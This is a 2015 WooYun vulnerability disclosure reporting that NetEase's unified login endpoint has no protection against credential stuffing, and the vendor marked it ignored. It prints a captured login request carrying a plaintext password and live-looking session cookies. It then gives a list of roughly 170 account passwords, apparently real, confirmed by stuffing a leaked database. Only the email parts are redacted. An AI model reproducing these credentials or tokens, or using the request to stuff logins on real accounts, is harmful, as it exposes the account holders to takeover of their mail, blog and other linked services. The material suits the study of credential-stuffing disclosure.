当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112024

漏洞标题:网易某重要接口撞库泄露用户登录凭据(有批量账号证明)

相关厂商:网易

漏洞作者: 路人甲

提交时间:2015-05-04 19:30

修复时间:2015-05-05 10:56

公开时间:2015-05-05 10:56

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-04: 细节已通知厂商并且等待厂商处理中
2015-05-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

撞库扫号攻击已经是Top 10 Security Risks for 2014之一.撞库以大量的用户数据为基础,利用用户相同的注册习惯(相同的用户名和密码),尝试登陆其它的网站。2011年,互联网泄密事件引爆了整个信息安全界,导致传统的用户+密码认证的方式已无法满足现有安全需求。泄露数据包括:天涯:31,758,468条,CSDN:6,428,559条,微博:4,442,915条,人人网:4,445,047条,猫扑:2,644,726条,178:9,072,819条,嘟嘟牛:13,891,418条,7K7K:18,282,404条,共1.2亿条。不管你的网站密码保护的多好,但是面对已经泄露的账号密码,撞库扫号防御还是一个相当重要的环节。

详细说明:

主站登录接口没有防御撞库。对登录接口的调用没有进行限制。经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号。 登录接口抓包如下:
由于网易账号是一站式的。所以,所有可以或得各种关联系统的权限,包括微博,博客,邮箱。等等能。

POST /logins.jsp HTTP/1.1
Host: reg.163.com
Connection: close
Content-Length: 230
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.163.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.163.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: usertrack=c+5+hVVAxQLBxR9jBeWgAg==; _ntes_nnid=4fc0b7199a1c9834e05c0d696f1cb9ea,1430308107352; SID=a8ff61f3-e067-46cd-9c83-0b8f7d314f9a; _ntes_nuid=4fc0b7199a1c9834e05c0d696f1cb9ea; Province=0571; City=0571; vjuids=eb751fe52.14d05bd1d69.0.e1a6c9db; JSESSIONID=dacaeQeXDF-5IbyK9xi0u; T_INFO=CE1F7243882AAA0FEBB261E71A3B9FA41F903565B4C9497BE810CD4E3FDFD8878098BA0EB3F9DE7E303573B8C0BB5B31EF33BC42C912FF0C2D77EE9BB51D0928; [email protected]%261%261%260%[email protected]%261%261%260%7C; URS_Analyze=1; ne_analysis_trace_id=1430728079918; pver_n_f_l_n3=a; n_ht_s=1; [email protected]|1430721918|2|urs|10&15|not_found&1430721790&163#zhj&330100#0#0#0|151519&0|163&urs|[email protected]; vjlast=1430320389.1430728080.13; vinfo_n_f_l_n3=efd1f43a14527912.1.0.1430320389504.0.1430728196488; s_n_f_l_n3=efd1f43a145279121430320389505
RA-Ver: 2.10.0
RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
username=570138905@qq%2ecom&password=wxl5927101&type=1&product=163&savelogin=0&url=http%3A%2F%2Fwww.163.com%2Fspecial%2F0077450P%2Flogin_frame.html&url2=http%3A%2F%2Fwww.163.com%2Fspecial%2F0077450P%2Flogin_frame.html&noRedirect=1

漏洞证明:

经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号.

[email protected]	lhm32411111
[email protected]	jun13788578250
[email protected]	njzhu045
[email protected]	jjzj334553086
[email protected]	wn1000015218
[email protected]	d3y47tjimmyzeng
[email protected]	hewotiaowuba
[email protected]	4034lj
[email protected]	13990844111
[email protected]	wxl5927101
[email protected]	Allen0112
[email protected]	11556688
[email protected]	n19880308n
[email protected]	53286566
[email protected]	lzb3227521
[email protected]	198552200
[email protected]	159357qtoetu
[email protected]	XRKSHI11
[email protected]	jay998849888
[email protected]	xujiqiang
[email protected]	ilovewen99@
[email protected]	qqq3394724
[email protected]	ailing123
[email protected]	19811103
[email protected]	hy1976109
[email protected]	19870925
[email protected]	08327656314
[email protected]	zl191215
[email protected]	w270811c
[email protected]	04151403
[email protected]	13309492097
[email protected]	tjq19880219
[email protected]	fox165910
[email protected]	85282465
[email protected]	zy840614
[email protected]	19900419
[email protected]	19780917
[email protected]	123456789
[email protected]	19831210
[email protected]	cheng911
[email protected]	123yiyaa
[email protected]	200853275214
[email protected]	zzp19900919
[email protected]	hjjzsf
[email protected]	jingjing
[email protected]	881129sjj
[email protected]	2119861020
[email protected]	2007198817
[email protected]	513148977
[email protected]	xiaozhu1117
[email protected]	5731381431
[email protected]	lang__1984
[email protected]	36991019s
[email protected]	shallin
[email protected]	kent123456
[email protected]	wdqq19870618
[email protected]	woaimama
[email protected]	55036081
[email protected]	niaiwoma
[email protected]	88995234
[email protected]	Jay261012
[email protected]	24248423
[email protected]	hj8229651
[email protected]	z19891110
[email protected]	feng_1321
[email protected]	wxy3844989
[email protected]	becky362329
[email protected]	LWZL139791
[email protected]	85651051
[email protected]	6967446sky
[email protected]	laure9797
[email protected]	a34416912
[email protected]	lw198718
[email protected]	y2212886
[email protected]	pa87722857
[email protected]	kaaiqkwmmo
[email protected]	68728883
[email protected]	!qazxsw@
[email protected]	46731007
[email protected]	19761102
[email protected]	QJJ0325521140
[email protected]	79532448
[email protected]	466427048
[email protected]	671223
[email protected]	fengyu0515
[email protected]	aiwind1314
[email protected]	19880623
[email protected]	82250755
[email protected]	microlab
[email protected]	1325747445
[email protected]	q514082801
[email protected]	icc1234567
[email protected]	wanghao110
[email protected]	813813813
[email protected]	1030238333
[email protected]	124592203
[email protected]	a3142895
[email protected]	ma2312251
[email protected]	passwordkm
[email protected]	30214401
[email protected]	26362511
[email protected]	zw8112151
[email protected]	123456as
[email protected]	13580617139
[email protected]	sha543DAN521
[email protected]	305185564
[email protected]	llg679865
[email protected]	chuanqicn
[email protected]	greed4123
[email protected]	senaiqian
[email protected]	63506729
[email protected]	woainimabi
[email protected]	19870424
[email protected]	liuxiao1991
[email protected]	nibiaoma
[email protected]	820834502
[email protected]	gaoli123
[email protected]	kele0628
[email protected]	74185288
[email protected]	hsb123569
[email protected]	73366227
[email protected]	520bafndx
[email protected]	huayinqiu13579
[email protected]	19850821
[email protected]	king2000
[email protected]	ossjzlzl
[email protected]	zzw034012
[email protected]	4615182520
[email protected]	woaidudu
[email protected]	lht237lht
[email protected]	1989527918911
[email protected]	58929176
[email protected]	0515-8106236
[email protected]	07307635920
[email protected]	123327854
[email protected]	fanchiqiang
[email protected]	huyin2915610
[email protected]	XMYXZ197807
[email protected]	820719123
[email protected]	t123a456y
[email protected]	1695174717
[email protected]	luo198706
[email protected]	19820425
[email protected]	65580321
[email protected]	7258725899
[email protected]	sth198557
[email protected]	thughero
[email protected]	senling52
[email protected]	830814guan
[email protected]	jkjkjk2009
[email protected]	19840110
[email protected]	y90139529
[email protected]	arsenal0577
[email protected]	lordwolf
[email protected]	ly86710467
[email protected]	919293729
[email protected]	qushuliang0426
[email protected]	kaizhang
[email protected]	07178682
[email protected]	gaoermao
[email protected]	yzhao888
[email protected]	sy12345678
[email protected]	1363916038
[email protected]	13432438925


屏幕快照 2015-05-04 下午2.46.08.png


屏幕快照 2015-05-04 下午2.43.04.png


屏幕快照 2015-05-04 下午2.40.21.png


修复方案:

撞库防御参考资料:http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-05 10:56

厂商回复:

感谢您对网易的关注!

最新状态:

暂无